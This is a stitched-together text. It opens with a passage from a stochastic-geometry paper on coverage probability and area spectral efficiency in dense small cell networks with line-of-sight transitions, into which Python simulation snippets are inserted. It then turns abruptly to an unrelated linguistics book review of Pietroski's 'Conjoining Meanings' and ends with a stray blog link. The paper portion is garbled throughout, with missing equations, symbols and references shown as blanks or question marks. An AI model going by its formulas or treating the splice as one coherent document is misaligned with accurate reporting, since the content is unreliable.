Before presenting our main analytical results, we first introduce the Equivalence Theorem that will be used throughout the paper. The purpose of introducing the Equivalence Theorem is to unify the analysis across different multi-path fading and/or shadowing models, and to reduce the complexity of our theoretical analysis.
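The SINR definition and the strongest-received-power association described above can be exercised with a one-snapshot Monte Carlo. Everything numeric below (reference losses, exponents, shadowing spreads, transmit power, the blockage parameter) is an illustrative assumption, not the paper's fitted values:

```python
import math
import random

def poisson_sample(mean, rng):
    """Knuth's method for a Poisson variate (fine for moderate means)."""
    limit, k, p = math.exp(-mean), 0, 1.0
    while True:
        p *= rng.random()
        if p <= limit:
            return k
        k += 1

def received_power_mw(r, is_los, rng):
    """Distance-dependent path loss plus log-normal shadowing (dB domain)."""
    ref_db, alpha, sigma = (30.0, 2.1, 3.0) if is_los else (33.0, 3.8, 8.0)
    pl_db = ref_db + 10.0 * alpha * math.log10(max(r, 1.0)) + rng.gauss(0.0, sigma)
    tx_dbm = 24.0
    return 10.0 ** ((tx_dbm - pl_db) / 10.0)

def snapshot_sinr(density, radius, noise_mw=1e-9, beta=0.01, rng=None):
    """One PPP snapshot around the typical MU at the origin: associate with
    the strongest received power, then compute that BS's SINR."""
    rng = rng or random.Random(0)
    n = poisson_sample(density * math.pi * radius ** 2, rng)
    powers = []
    for _ in range(n):
        r = radius * math.sqrt(rng.random())          # uniform in the disk
        is_los = rng.random() < math.exp(-beta * r)   # blockage model
        powers.append(received_power_mw(r, is_los, rng))
    if not powers:
        return None  # no BS in range
    s = max(powers)  # strongest power == highest SINR (the Lemma in the text)
    return s / (sum(powers) - s + noise_mw)
```

Because every interferer's power enters the denominator, picking the strongest numerator automatically maximizes the SINR, which is the equivalence the text's Lemma formalizes.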
Then, based on this theorem, we derive the cumulative distribution function (CDF) of the strongest received signal power.

### 4.1 The Equivalence of SCNs

In this subsection, an equivalent SCN to the one being analyzed is introduced, which specifies how the intensity measure and the intensity change after a transformation of the original PPPs. More specifically, the received signal powers in Eq. (1) and Eq. (2) can be rewritten in terms of equivalent distances. From the discussion in Subsection ?, the BS locations can be viewed as a non-homogeneous PPP with an equivalent intensity. Through the above transformation, which scales the distances between the typical MU and all other BSs using Eq. (8) and Eq. (9), the scaled point process for NLOS BSs (or LOS BSs) still remains a PPP, according to the displacement theorem [28]. The intuition is that, in the equivalent network, the received signal power and the cell association scheme depend only on the new equivalent distance between the BSs and the typical MU, while the effects of transmit power, multi-path fading and shadowing are incorporated into the equivalent intensity (or the equivalent intensity measure) of the transformed point process. Besides, the two transformed point processes are mutually independent because of the independence between Φ_NL and Φ_L. As a result, the performance analysis involving path loss, multi-path fading, shadowing, etc., can be handled in a unified framework. This motivates the following theorem. In [29], a similar theorem, also extended from Blaszczyszyn's work [8], was proposed to analyze a higher-dimensional network in which NLOS and LOS transmissions are not considered. By the Equivalence Theorem, the transformed cellular network has exactly the same performance for the typical MU with respect to the coverage probability and the ASE as the original network, which is proved in Appendix A and validated by Monte Carlo simulations in Section 7.
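The distance-scaling at the heart of the Equivalence Theorem can be verified numerically: absorbing transmit power and shadowing/fading into an "equivalent distance" leaves the received power unchanged. A sketch under a simple power-law model P = g · r^(−α), with our own symbol names:

```python
import random

def equivalent_distance(r, gain, alpha):
    """Map a BS at distance r with aggregate gain g (transmit power times
    shadowing/fading) to the distance of a unit-gain BS with the identical
    received power: g * r**(-alpha) == r_eq**(-alpha), so
    r_eq = r * gain**(-1/alpha)."""
    return r * gain ** (-1.0 / alpha)

rng = random.Random(0)
alpha = 3.8
for _ in range(1000):
    r = rng.uniform(1.0, 1000.0)
    gain = rng.lognormvariate(0.0, 2.0)  # a shadowing realisation
    p_original = gain * r ** (-alpha)
    p_equiv = equivalent_distance(r, gain, alpha) ** (-alpha)
    assert abs(p_original - p_equiv) <= 1e-9 * p_original
```

Since the map preserves every BS's received power exactly, it also preserves the identity of the strongest BS and the interference sum, which is why coverage probability and ASE are unchanged in the transformed network.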
After the transformation, the received signal power and the cell association scheme depend only on the equivalent distances between the BSs and the typical MU, while the effects of transmit power, multi-path fading and shadowing are incorporated into the equivalent intensities shown in Eq. (?) and Eq. (?). Therefore, the complexity of the theoretical analysis can be significantly reduced. In the next subsection, we provide an application of the Equivalence Theorem, i.e., using it to derive the distribution of the strongest received signal power.

### 4.2 The Distribution of the Strongest Received Signal Power

In this subsection, we use stochastic geometry and Theorem ? to obtain the distribution of the strongest received signal power, and then use simulation results to validate our theoretical analysis. If a specific NLOS/LOS transmission model is given, the distribution of the strongest received signal power can easily be derived using Lemma ?. The following is an example assuming that the LOS transmission probability follows a negative exponential form. Assume that Pr_LOS(r) = exp(−β r) and Pr_NLOS(r) = 1 − exp(−β r), where β is a constant determined by the density and the mean length of blockages lying in the visual path between the typical MU and the connected BS [11]; then the CDF of the strongest received signal power is given by Eq. (?). Fig. ? illustrates the CDF of the strongest received signal power, and it can be seen that the simulation results perfectly match the analytical results. From Fig. ?, we find that over 50% of the strongest received signal power realizations exceed -51 dBm at the lower BS density, and this value increases by approximately 16 dB at the higher density, which indicates that the strongest received signal power improves as the BS density increases.
## 5 The Coverage Probability and ASE Analysis

In downlink performance evaluation, for networks where BSs are randomly distributed according to a homogeneous PPP, it is sufficient to study the performance of the typical MU located at the origin to characterize the performance of an SCN, using the Palm theory [26]. In this section, the coverage probability is first investigated, and then the ASE is derived from the coverage probability results. The coverage probability is generally defined as the probability that the typical MU’s measured SINR is greater than a designated threshold , i.e., where the definition of SINR is given by Eq. (Equation 5) and the subscript is omitted here for simplicity. We now present a main result of this section on the coverage probability as follows. The coverage probability evaluated by Eq. ( ?) in Theorem ? is at least a 3-fold integral, which is complicated for numerical computation. However, Theorem ? gives general results that can be applied to various multi-path fading or shadowing models, e.g., Rayleigh fading, Nakagami- fading, etc., as well as various NLOS/LOS transmission models. In the following, we focus on a special scenario in which a simplified NLOS/LOS transmission model is adopted for ease of numerical evaluation, expressed as follows where is a constant distance below which all BSs connect with the typical MU via LOS transmissions. This model has been used in some recent work [11]. With the assumptions above, the intensity measure for NLOS transmissions, i.e., , is expressed as follows where is the complementary error function, and , and are all constants. After obtaining , the density of NLOS BSs, i.e., , can readily be derived as follows Similarly, the intensity measure and density for LOS BSs are respectively, where , and are all constants. By substituting and above into Eq. ( ?) and Eq. ( ?), the coverage probability can be obtained in this specific scenario, followed by results in Section ?.
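For the simplified model just described (a BS is in LOS if and only if it is closer than the cutoff distance), the coverage probability can also be estimated by brute-force simulation, which is how the analytical results are validated later. The sketch below uses placeholder values for the cutoff, path-loss exponents and noise power (assumptions, not the paper's parameters), with unit transmit power and no fading:

```python
import numpy as np

def coverage_probability(T, lam=1e-4, radius=2000.0, Rc=250.0,
                         a_los=2.5, a_nlos=4.0, noise=1e-10,
                         n_trials=500, seed=0):
    """Monte Carlo SINR coverage under the simplified LOS model:
    a BS is in LOS iff its distance to the typical MU is below Rc."""
    rng = np.random.default_rng(seed)
    area = np.pi * radius ** 2
    covered = 0
    for _ in range(n_trials):
        n = rng.poisson(lam * area)
        if n == 0:
            continue
        r = radius * np.sqrt(rng.random(n))       # uniform PPP distances
        alpha = np.where(r < Rc, a_los, a_nlos)   # LOS below Rc, NLOS above
        p = r ** (-alpha)                         # unit Tx power, no fading
        s = p.max()                               # strongest-power association
        covered += s / (p.sum() - s + noise) > T
    return covered / n_trials

# With the same seed the realizations are identical across calls, so
# coverage is exactly non-increasing in the SINR threshold T:
assert coverage_probability(0.1) >= coverage_probability(10.0)
```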
In the above scenario, the shadowing follows log-normal distributions. However, Theorem ? can also be applied to a generalized shadowing/fading model, and the coverage probability with Rayleigh fading will be derived in Section ?. In the following, an asymptotic analysis is given for the situation where the BS deployment becomes ultra dense, i.e., , which helps to analyze the performance in a concise form. From Corollary ?, it can be concluded that for dense SCNs the coverage probability is invariant with respect to the BS density and even the distribution of shadowing/fading. However, when the BS density is not high enough, the coverage probability exhibits interesting behavior, which will be fully studied in Section ?. Finally, the ASE in units of for a given BS density can be derived as follows

## 6 Comparisons with Other Cell Association Schemes

In this section, we apply Theorem ? to an SCN with Rayleigh fading. Moreover, the strongest received signal power association scheme is compared with the nearest BS association scheme to evaluate the performance impact of the two different cell association schemes. For brevity, we denote the Strongest Power Association Scheme and the Nearest BS Association Scheme by SPAS and NBAS, respectively. As the majority of previous work considered Rayleigh fading and ignored log-normal shadowing, in this part we apply our proposed model to the Rayleigh fading scenario for the sake of a fair comparison. The main difference in the theoretical analysis when replacing log-normal shadowing with Rayleigh fading lies in the intensity measure and the intensity. Assuming that and follow exponential distributions with rates and , respectively, then , , , can be calculated based on Theorem ? as follows and where and denote the upper and the lower incomplete gamma functions, respectively, and is the gamma function. By incorporating Eq. (Equation 17) - (Equation 20) into Eq.
( ?), the coverage probability of an SCN experiencing Rayleigh fading while using SPAS can be calculated. We omit the rest of the derivations for brevity. In this part, the coverage probability is provided by applying NBAS. Two scenarios are considered, i.e., with and without consideration of the coexistence of NLOS and LOS transmissions, for comparison with SPAS. With consideration of NLOS and LOS transmissions: the derivations are very similar to the work in [30] and we just present the results as follows Without considering the coexistence of NLOS and LOS transmissions: if we do not differentiate NLOS and LOS transmissions, the coverage probability using NBAS is given in [7] as follows where and

## 7 Simulations and Discussions

This section presents numerical results to validate our analysis, followed by discussions to shed new light on the performance of SCNs. We use the following parameter values: , , , , , , 3, , , 4, and [11].

### 7.1 Validation of the Analytical Results of pc(λ,T) with Monte Carlo Simulations

Fig. ? illustrates the coverage probability with respect to different SINR thresholds. We can observe that the analytical results (solid lines or dash lines) match well with the simulation results (markers), which validates our analysis. The coverage probability decreases as the SINR threshold increases, which is intuitively correct since a higher SINR threshold requires a higher signal quality. We also plot figures adopting different shadowing/fading models, i.e., log-normal shadowing and Rayleigh fading. To fully study the SINR coverage probability with respect to the BS density, the results of configured with and assuming SPAS are plotted in Fig. ? and Fig. ?. As can be observed from Fig. ?, the analytical results match the simulation results well with respect to various BS intensities from to . With the assistance of Fig.
?, we conclude that the performance of small cell networks can be divided into four different regimes according to the density of small cell BSs, where in each regime the performance is dominated by different factors.

• Noise-Limited Regime (NLR): ( in Fig. ( ?) and using the parameters in the simulation). In this regime, the typical MU is likely to have an NLOS path to the serving BS. The network in the NLR is very sparse, and thus the interference can be ignored compared with the thermal noise if we use the SINR as the performance metric. In this case, and the coverage probability increases with the increase of , as the strongest received power () grows while the noise power () remains the same. If we instead use the SIR as the performance metric, the SIR coverage probability remains almost stable in this regime as increases, because the increase in the received signal power is counterbalanced by the increase in the aggregate interference power. Besides, as the aggregate interference power is smaller than the noise power, the SIR coverage probability is larger than the SINR coverage probability.

• Signal NLOS-to-LOS-Transition Regime (SN2LTR): ( in Fig. ( ?) and using the parameters in the simulation). In this regime, when is small, the typical MU has a higher probability of connecting to an NLOS BS, while as becomes larger, the typical MU has an increasingly higher probability of connecting to a LOS BS. That is to say, with the increase of , the typical MU is more likely to be in LOS with the associated BS, i.e., the received signal transitions from an NLOS to a LOS path. Even though the associated BS is in LOS, the majority of interfering BSs are still NLOS in this regime, and thus the SINR (or SIR) coverage probability keeps growing. Besides, from this regime on, the noise power has a negligible impact on the coverage performance, i.e., the SCN is interference-limited.

• Interference NLOS-to-LOS-Transition Regime (IN2LTR): ( in Fig. ( ?) and using the parameters in the simulation).
In this regime, the typical MU is connected to a LOS BS with a high probability. However, different from the situation in the SN2LTR, the majority of interfering BSs experience transitions from NLOS to LOS paths, which causes much more severe interference to the typical MU compared with NLOS interfering BSs. As a result, the SINR (or SIR) coverage probability decreases with the increase of , because the transition of interference from NLOS to LOS paths causes a larger increase in interference than in signal.

• Dense Interference-Limited Regime (DILR): ( in Fig. ( ?) and using the parameters in the simulation). In this regime, the network is extremely dense and grows close to the LOS-BS-only scenario with the increase of . The SINR (or SIR) coverage probability becomes stable with the increase in BS density, as any increase in the received LOS BS signal power is counterbalanced by the increase in the aggregate LOS BS interference power, which is also illustrated by Corollary ?.

Another interesting observation in Fig. ? is that the network experiencing Rayleigh fading outperforms that experiencing log-normal shadowing when the network is sparse, while the network experiencing log-normal shadowing outperforms that experiencing Rayleigh fading when the SCN becomes dense. However, this phenomenon is highly related to the assumed SINR threshold, which is shown in Fig. ?. If the SCN becomes ultra dense, the coverage probability approaches the same asymptotic value regardless of the shadowing or fading model. In Fig. ?, we compare the performance of different cell association schemes using NBAS as a baseline. To guarantee the fairness of the comparison, Rayleigh fading is assumed for all studied scenarios. It is observed that, assuming SPAS, the coverage probability shows a considerable gain compared with that assuming NBAS, with the peak coverage probability rising from 0.6 to 0.8.
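The Rayleigh-fading expressions of Section 6 are stated in terms of the upper and lower incomplete gamma functions. When evaluating them numerically, note that SciPy exposes regularized versions, so the unnormalized functions must be recovered by multiplying with Γ(s); the fractional moment E[h^(2/α)] of an exponential fading variable, which enters the equivalent intensity, is itself a gamma value, Γ(1 + 2/α). The arguments below are illustrative placeholders, not the paper's parameters:

```python
import numpy as np
from scipy.special import gamma, gammainc, gammaincc

def lower_inc_gamma(s, x):
    """Unnormalized lower incomplete gamma via SciPy's regularized gammainc."""
    return gamma(s) * gammainc(s, x)

def upper_inc_gamma(s, x):
    """Unnormalized upper incomplete gamma via SciPy's regularized gammaincc."""
    return gamma(s) * gammaincc(s, x)

s, x = 2.0 / 3.5, 1.7                    # e.g. s = 2/alpha for alpha = 3.5
assert np.isclose(lower_inc_gamma(s, x) + upper_inc_gamma(s, x), gamma(s))

# Fractional moment E[h^(2/alpha)] for h ~ Exp(1) equals gamma(1 + 2/alpha).
rng = np.random.default_rng(0)
h = rng.exponential(1.0, 200_000)
assert abs((h ** (2.0 / 3.5)).mean() - gamma(1.0 + 2.0 / 3.5)) < 0.01
```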
Besides, we also plot figures that exclude NLOS/LOS transmissions, i.e., the single-slope path loss model [7] is adopted. It is found that the coverage probability first increases with the BS density and then becomes stable and independent of when the SCN is dense, if we apply the parameters of NLOS transmissions to the single-slope path loss model. In comparison, the coverage probability is stable even when the BS density is rather sparse, if we apply the parameters of LOS transmissions to the single-slope path loss model.

### 7.2 Boundary Definitions

Based on the qualitative results above, it is interesting to develop a quantitative definition of the boundaries between adjacent regimes. In this subsection, we propose the following definition to characterize three BS density boundaries, which makes the analysis of SCNs more formal. The intuition behind this definition is that when , the aggregate interference has a greater impact on the network performance than the noise. The definition above reveals that is the maximum coverage probability if other parameters are fixed. When , LOS interference degrades the coverage performance. When becomes larger and larger, the SCN falls into the DILR, i.e., the aggregate interference might be extremely large, as shown by Eq. ( ?). In the following, we analyze the ASE performance in the four defined regimes.

### 7.3 Discussion on the Analytical Results of ASE(λ)

In this part, the ASE with is evaluated analytically only, as is a function of , shown in Eq. (Equation 16). Fig. ? illustrates the ASE with different cell association schemes vs. the BS density . It is found that the ASE of the sparse SCN has a growth tendency similar to that of the SCN employing NLOS transmission configurations, while the ASE of the dense SCN approaches the performance of the SCN employing LOS transmission configurations.
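The ASE curves discussed above follow mechanically once pc(λ, T) is known. As a sketch, assuming the widely used definition ASE(λ) = λ · pc(λ, T) · log2(1 + T) in bps/Hz/m² (an assumed form — the paper's exact expression is not reproduced in this extraction):

```python
import numpy as np

def ase(lam, pc, T):
    """Area spectral efficiency, assuming the common form
    ASE = lambda * pc(lambda, T) * log2(1 + T)  [bps/Hz/m^2].
    The paper's exact Eq. is not reproduced here."""
    return lam * pc * np.log2(1.0 + T)

# With the coverage probability held fixed, the ASE is linear in density,
# which is the near-linear DILR behavior described above.
assert np.isclose(ase(2e-4, 0.6, 1.0), 2.0 * ase(1e-4, 0.6, 1.0))
# A moderate drop in coverage slows, but does not by itself reverse, ASE growth:
assert ase(2e-4, 0.5, 1.0) > ase(1e-4, 0.6, 1.0)
```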
Specifically, when the SCN is in the NLR and the SN2LTR, e.g., , the ASE quickly increases with because the network is generally noise-limited or the aggregate interference power is relatively low, and thus adding more small cells immensely benefits the ASE of the SCN. When the network is in the front section of the IN2LTR, i.e., , the ASE exhibits a slowdown in its growth rate due to the fast decrease of the coverage probability at , which is shown in Fig. ?, Fig. ? and Fig. ?. Second, when , the ASE picks up its growth rate, since the decrease of the coverage probability becomes a minor factor compared with the increase of the BS density . Finally, when the SCN becomes extremely dense, i.e., in the DILR, the ASE exhibits a nearly linear trajectory with regard to , because both the signal power and the interference power are now LOS dominated and thus statistically stable, as explained before.

### 7.4 Guidance on Network Design

Based on the findings of the NLOS-to-LOS transition, in this subsection we introduce some guidance on how to design and manage cellular networks in order to optimize the network performance as we evolve into dense SCNs. As described in Sections ? and ?, the ASE almost surely increases as SCNs become denser due to the gain of frequency reuse. In contrast, the coverage probability of SCNs first increases and then decreases with the increase of the BS density . In this context, there is a trade-off between the coverage probability and the ASE in future 5G SCNs incorporating both NLOS and LOS transmissions, whereas in [7] denser SCNs always provide better network performance with respect to both the ASE and the coverage probability. According to the data, the current 4G network is operating in the SN2LTR. As we deploy more and more BSs in the future to meet the skyrocketing demands on wireless data, the network will fall into the IN2LTR.
In this regime, we need to elaborately design the network system, including transmission techniques, medium access control (MAC) protocols and coding techniques, to compensate for the impairment of network coverage caused by strong LOS interference. Common interference management approaches include interference cancellation, interference avoidance and interference control. By jointly utilizing advanced transmission techniques such as beamforming, multiple-input multiple-output (MIMO) and other multi-antenna techniques, coordinated multi-point (CoMP) transmissions and better coding techniques, the interference can be mitigated to an acceptable level, which significantly benefits both the coverage probability and the ASE.

## 8 Conclusions and Future Work

In this paper, we illustrated the transition behaviors in SCNs incorporating both NLOS and LOS transmissions. Based on our analysis, the network can be divided into four regimes, i.e., the NLR, the SN2LTR, the IN2LTR and the DILR, where in each regime the performance is dominated by different factors. The analysis helps to understand which factor dominates the cellular network performance as the BS density continually grows, and therefore provides guidance on the design and management of cellular networks as we evolve into dense SCNs. Moreover, our work adopts a generalized shadowing/fading model, in which log-normal shadowing and/or Rayleigh fading can be treated in a unified framework. In our future work, shadowing and multi-path fading will be considered simultaneously, which is more practical for real networks. Furthermore, heterogeneous networks (HetNets) incorporating both NLOS and LOS transmissions will also be investigated.

## Appendix A: Proof of Theorem

Firstly, we will obtain the intensity measure of ; the intensity is then easily acquired by taking the derivative of .
By using the displacement theorem [8], the point process is Poisson with intensity measure where is a ball centered at the origin with radius , and results from converting from Cartesian to polar coordinates. Then the intensity of , denoted by , can be given by Note that to ensure the intensity measure is finite for any bounded set (a set is bounded if it can be contained in a ball with a finite radius), has to satisfy a certain condition. As , from Eq. (Equation 21), we get the following inequality If the expectation , then . Using a similar approach, the intensity measure and intensity of the PPP are obtained by Eq. ( ?) and Eq. ( ?), respectively. As for the cell association scheme, it is obvious that the original scheme is equivalent to the scheme , which actually corresponds to the nearest BS association scheme. Thus the proof is completed.

## Appendix B: Proof of Lemma

Denote the strongest NLOS received signal power and the strongest LOS received signal power by and , respectively; that is, and . Then the probability can be derived as where the notation refers to the number of points contained in the set , equality follows from the independence of the PPPs and , and comes from the void probability of a non-homogeneous PPP. The rest of the proof is then straightforward.

## Appendix C: Proof of Theorem

By invoking the law of total probability, the coverage probability can be divided into two parts, i.e., and , which denote the conditional coverage probabilities given that the typical MU is associated with a BS in and , respectively. Moreover, denote by and the strongest received signal power from BSs in and , i.e., and , respectively. Then, by applying the law of total probability, can be computed by where is the equivalent distance between the typical MU and the BS providing the strongest received signal power to the typical MU in , i.e., , and also note that .
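The key ingredient in Appendix B (and again in Appendix C) is the void probability of a PPP, P(N(B) = 0) = exp(-Λ(B)). For a homogeneous PPP this is easy to verify by simulation; the density and radii below are arbitrary illustrative choices:

```python
import numpy as np

def void_probability_mc(lam=2e-4, r_void=40.0, radius=500.0,
                        n_trials=10_000, seed=0):
    """Monte Carlo estimate of P(no point of a homogeneous PPP of density
    lam falls within distance r_void of the origin)."""
    rng = np.random.default_rng(seed)
    area = np.pi * radius ** 2
    empty = 0
    for _ in range(n_trials):
        n = rng.poisson(lam * area)
        # A realization is 'void' if it has no points or all lie beyond r_void.
        empty += (n == 0) or (radius * np.sqrt(rng.random(n))).min() > r_void
    return empty / n_trials

est = void_probability_mc()
exact = np.exp(-2e-4 * np.pi * 40.0 ** 2)   # exp(-lam * |B|)
assert abs(est - exact) < 0.03
```

The CDF of the strongest received power in the Lemma is exactly this void probability evaluated for the transformed (non-homogeneous) processes, with Λ(B) replaced by the equivalent intensity measure.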
Besides, Part I guarantees that the typical MU is connected to a LOS BS and Part II denotes the coverage probability conditioned on the proposed cell association scheme in Eq. (Equation 7). Next, Part I and Part II will be respectively derived as follows. For Part I, where , similar to the definition of , is the equivalent distance between the typical MU and the BS providing the strongest received signal power to the typical MU in , i.e., , and also note that , and follows from the void probability of a PPP. For Part II, we know that where and denote the aggregate interference from NLOS BSs and LOS BSs, respectively. The conditional coverage probability is derived as follows where denotes the SINR when the typical MU is associated with a LOS BS, the inner integral in is the conditional PDF of , and
# Zeitschrift für Sprachwissenschaft

Online ISSN 1613-3706 · Volume 38, Issue 2

# Paul M. Pietroski: Conjoining Meanings. Semantics Without Truth Values

Kai-Uwe Carstensen

Published Online: 2019-09-14 | DOI: https://doi.org/10.1515/zfs-2019-2005

## Reviewed publication

Paul M. Pietroski: Conjoining Meanings. Semantics Without Truth Values. Oxford: Oxford University Press (Context and Content), 2018, X + 393 pages.

There is an enormous range of theories of meaning in linguistics and philosophy, and most notably, there is still a wide gap between logical and (especially cognitive) linguistic approaches. With his monograph Conjoining Meanings (henceforth CM), Paul M. Pietroski sets out to join the communities and to bridge this gap with an “internalist semantics” approach to meaning that is cognitive in the Chomskyan sense, but rooted in modern logic. In Chapter 0 “Overture”, Pietroski introduces the core assumptions of CM treated in more depth in later chapters. He starts by saying that human natural languages (which he calls “Slangs”) are generative procedures that connect meanings with pronunciations. Continuing with what meanings are not, he rejects both the notion ‘meanings are concepts’ (i. e., to identify meanings and concepts) and ‘meanings are extensions’ (or corresponding/equivalent truth-conditional conceptions, i. e., the propositional and Davidsonian stances according to Speaks 2018). Instead, Pietroski proposes to view meanings as instructions for how to access simple concepts or build complex concepts.
As to semantic composition, he notes that Frege’s functor-argument apparatus and derivatives like type-theoretic Lambda calculus are much too powerful to model human meaning composition. The alternative he then previews is based on a restricted kind of predication (only classificatory monadic concepts of type $\langle\text{M}\rangle$ and relational dyadic concepts of type $\langle\text{D}\rangle$) with corresponding compositional operations (M-junction, D-junction). Chapter 1 elaborates on the linguistic reasons for assuming a mentalist, generative, non-extensional approach, where meaning is neither based on extensions or representations of extensions, nor on relations to truth values (contrary to Lewisian, Davidsonian, and also Montagovian approaches). To exemplify his points, Pietroski uses linguistic ambiguities, Putnam’s “water” case, and Liar sentences. Chapter 2 introduces concepts as “composable mental symbols that can be used to think about things” (p. 77) based on predicates which Pietroski shows can be motivated by classical logic (cf. 3.1) but differ from those in other current accounts. He argues that monadic predicates should not be regarded as truth-valued functions, and shows that human concepts are more restricted than what can be represented with standard logic (with its characteristic use of variables and its truth-theory-motivated use of conjunction). He also points to the observation that proper nouns cannot always be formalized with $\langle\text{e}\rangle$-type expressions, which renders functor-argument application at least less straightforward. Instead of “$\lambda\text{x}$ [COW(x) & BROWN(x)]”, the meaning of brown cow therefore appears as “[$\text{COW(_)}^{\wedge}\text{BROWN(_)}$]”, conjoined by M-junction in his formal language. Finally, Pietroski holds that dyadic predicates are sufficient to represent concept relations (as opposed to the profligate adicity of predicates in logic).
In his approach, therefore, every relational aspect has to be introduced by D-joining an atomic dyadic concept with a monadic concept specifying the internal relational slot. This operation is exemplified for the concept ‘above the cow’ shown below (taken from p. 104), where the existential quantifier is introduced syncategorematically to bind the internal unsaturated slot. I will not talk much about Chapters 3 to 7, where Pietroski motivates his approach in substantial and respectable depth. Chapter 3 is about retracing the developments from Frege via Tarski to Church (rather than via Carnap to Montague) as a basis for his restricted Tarski-style formalism. Chapter 4 elaborates on the Liar Paradoxes, and Chapter 5 discusses (event) framing effects, taking both of them as indicators for the need to rule out truth-theoretic accounts of meaning. Chapter 6 turns to linguistic evidence, including problems posed by lexical semantic polyadicity, argument linking, plurals, and (shifts between) mass/count word senses. Chapter 7 goes even further and discusses “minimal semantic instructions” in his framework, i. e., meaning composition of linguistic expressions containing tense, relative clauses, negation, and quantification. Chapter 8 (“Reprise”) briefly summarizes the basic tenets of the book. Suffice it to say that all this is presented in an informed manner on a broad fundament of knowledge, with a detailed argumentation (sometimes “somewhat tediously” [p. 144], as he himself admits) based on examples that are well-known to members of the Linguistics & Philosophy community. The value of CM lies in its competent criticism of logical approaches to meaning (composition) without dismissing them. I expect it to be a source of fruitful discussion especially among theoreticians of philosophical logic. As a Cognitivist, I can subscribe to large parts of Pietroski’s argumentation, especially when it comes to the linguistic or cognitive topics.
In the following, I will elaborate on points of lesser agreement. As a start, there are some issues with terminology. First, calling natural languages “Slangs” is awkward for the ordinary linguist. Second, the whole talk of “meaning as instructions (to fetch concepts)”, e. g., “M-join(fetch@BROWN, fetch@COW)” (simplified here), is an unfortunately common case of both interpretative wording and implicit inadequate homunculization. Consider a speaking person with some content-to-be-uttered: how are the pronunciations accessed, and who is the instructor? This criticism also applies to the occasional use of “procedure” or “algorithm” by Pietroski, and shows that he takes a procedural perspective where a declarative view would be appropriate. In other words, semantics (a term Pietroski eschews, by the way) should rather be viewed as an interface between syntax and meaning (conceptual content) as proposed by some, with (Bierwisch, Lang) or without (Jackendoff) a discrete semantic level. This is explicitly denied by Pietroski (“I don’t posit any ‘interface’ between syntax and meaning”, p. 292). This brings me to the presentation of cognitive semantic ideas in CM, and to referencing in general. It is quite astonishing how many people are cited or referred to: scarcely anyone in the who’s who of logic is missing (Carnap being the notable exception), not even Leibniz, Descartes or Kant. Unfortunately, this is very different for cognitive semantic linguists, although CM represents a cognitive approach to semantics and meaning. While Fillmore (event participants and framing), Jackendoff (internal semantics) and Kamp (discourse representation formalism, tense) at least get mentioned in one or two footnotes, Lakoff (quantifiers as predicates, polysemy) does not appear at all, let alone Langacker or Goldberg (constructionist analogues of argument linking). There is a similar asymmetry with regard to the content of CM.
While Tarski and Church get an in-depth treatment, the linguistic parts appear to be rather superficially collected and handled. For example, while tense receives the standard Reichenbachian treatment, the intricacies of aspect are left out. From Williams, Pietroski borrows the distinction of external and internal arguments. (1) is his formalization of She stabbed him (p. 320).

(1) $\text{PAST-SIMPLE(_)}^{\wedge}\exists[\text{EXTERNAL(_,_)}^{\wedge}[\text{FEMALE(_)}^{\wedge}\text{FIRST(_)}]]^{\wedge}\text{STAB(_)}^{\wedge}\exists[\text{INTERNAL(_,_)}^{\wedge}[\text{MALE(_)}^{\wedge}\text{SECOND(_)}]]$

Leaving aside the strange handling of syntactic pronominal indices as predicates (which he admits), his representation of the structural external/internal-distinction (with predicates generalizing theta roles) seems dubious to me. Quantification is treated à la mode in CM. But in (2), the formal representation Pietroski presents for Every spy arrived (p. 331), it is by no means clear to the reader how the maximality operator is compositionally prefixed to the predicates.

(2) $[\text{EVERY(_)}^{\wedge}\exists[\text{INTERNAL(_,_)}^{\wedge}\text{MAX:A-SPY(_)}]]^{\wedge}\exists[\text{EXTERNAL(_,_)}^{\wedge}\text{MAX:ARRIVED(_)}]$

Let me summarize this a bit. Yes, I think Pietroski succeeds in exposing what I regard as a neglected issue in logical semantics: the fact that meanings are throughout construed as properties represented by lambda expressions (i. e., taking a semantic argument; e. g., “$\lambda\text{x}$ COW(x)” for cow, “$\lambda\text{x}$ BROWN(x)” for brown) while their linguistic expressions obviously can differ in syntactic argument structure (yet CM offers no alternative for the corresponding distinction between referential and non-referential semantic arguments).
And yes, I also think that current semantic composition mechanisms are too powerful. However, Pietroski throws out the baby with the bath water when abandoning variables, predicates with 3+ arguments, and lambda calculus altogether. Before doing that, he should have shown that his formalism is able to deal with the intricate aspects of semantics discussed in the last 40 years or so (the distinction of linguistic and non-linguistic concepts; detailed semantic analyses of lexical items; principles of polysemy; coherently handling linguistic domains like gradation and quantification in language understanding, production, and learning), and that the desired cognitive formalization cannot be achieved by restricting and extending the available mechanisms. For example, it is hard to conceive of decompositional semantic approaches without named variables, and personally, I think that variable-binding quantifiers, not variables, are the real problem (note also the heterogeneity of “∃” and “every(_)” in CM). Most importantly, with his internalist Fodorian semantics Pietroski has lost what is so important both for logic and cognition: the relation to the world. The count/mass-distinction and the problems it poses for semantics and ontology can be used to exemplify this point. His solution, as I understand it, is to have distinction-less stem-concepts (marked with “$\sqrt{\ }$”) for all nouns (e. g., “$\sqrt{\ }\text{FISH(_)}$”), which can be joined with certain distinguisher-concepts to yield countable or mass concepts (similar to classifier languages).
Stein’s famous quotation, slightly modified, fits perfectly as an objection here: “A rose is an object is an object!” In other words, while there seem to be ways of coercion between count and mass, rose denotes countable objects, and before abstracting to some hypothesized common denominator, one might rather consider formalizing the mechanisms of coercion as part of a general theory of polysemy. Correspondingly, given the importance of the structure of the (if only perceptual) world, and recent widespread interest both in cognition and in what there is or can be (experienced) (Carstensen 2011, Decock 2018, Zlatev 2016), one should start there and then build or modify formal systems accordingly.

## References

• Carstensen, Kai-Uwe. 2011. Toward cognitivist ontologies. Cognitive Processing 12(4). 379–393.
• Decock, Lieven. 2018. Cognitive metaphysics. Frontiers in Psychology 9(1700). 1–11.
• Speaks, Jeff. 2018. Theories of meaning. In Edward N. Zalta (ed.), The Stanford Encyclopedia of Philosophy (Winter 2018 Edition). https://plato.stanford.edu/archives/win2018/entries/meaning/ (03.01.2019).
• Zlatev, Jordan. 2016. Turning back to experience in cognitive linguistics via phenomenology. Cognitive Linguistics 27(4). 559–572.

Published Online: 2019-09-14. Published in Print: 2019-11-03.

Citation Information: Zeitschrift für Sprachwissenschaft, Volume 38, Issue 2, Pages 299–303, ISSN (Online) 1613-3706, ISSN (Print) 0721-9067
http://quomodocumque.wordpress.com/2011/11/
